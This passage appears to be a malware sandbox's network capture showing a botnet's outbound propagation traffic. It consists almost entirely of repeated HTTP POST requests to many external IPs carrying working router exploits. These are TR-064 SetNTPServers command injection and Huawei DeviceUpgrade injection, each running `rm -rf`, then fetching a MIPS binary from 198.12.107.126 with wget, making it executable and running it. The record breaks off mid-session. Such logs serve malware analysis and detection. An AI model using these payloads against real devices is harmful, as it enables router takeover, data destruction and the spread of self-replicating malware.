                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          93192.168.2.1338316168.211.82.507547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.903716087 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          94192.168.2.135431074.194.189.2037547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:03.907944918 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          95192.168.2.1356436197.66.118.14437215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.450172901 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          96192.168.2.1336968197.110.66.25337215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.452083111 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          97192.168.2.1357694197.92.154.10437215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.454145908 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          98192.168.2.133317641.64.216.20037215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.554328918 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          99192.168.2.1337268197.43.94.22037215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.555510044 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          100192.168.2.1341612197.173.145.3437215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.558624983 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          101192.168.2.1348036197.69.92.23537215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.559931993 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          102192.168.2.1340440157.104.28.11837215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.561403036 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          103192.168.2.1354720157.192.10.16537215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.562853098 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          104192.168.2.1347782157.6.178.337215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.564426899 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
